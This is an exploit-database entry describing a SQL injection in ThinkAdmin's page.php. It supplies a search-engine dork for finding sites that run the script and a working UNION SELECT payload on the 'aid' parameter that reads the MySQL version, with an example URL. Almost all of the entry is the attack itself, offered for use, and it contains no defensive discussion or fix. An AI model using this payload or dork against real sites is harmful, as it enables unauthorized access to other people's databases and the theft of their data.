id: 10737
date: 01/30/2010
title: ThinkAdmin (page.php) Sql Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

=================================================
ThinkAdmin (page.php) Sql Injection Vulnerability
=================================================

.:. Script : ThinkAdmin
.:. Script Download: http://www.thinkadmin.net/
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : Powered by ThinkAdmin

===[ Exploit ]===
 
www.site.com/page.php?id=21&aid=12[SQL INJECTION]&s=3
 
www.site.com/page.php?id=21&aid=-12'+union+select+1,version(),3,4,5,6,7,8-- -&s=3
 
===[ Example ]===
 
http://server/page.php?id=21&aid=-12'union+select+1,version(),3,4,5,6,7,8-- -&s=3



#  0day.today [2023-03-23]  #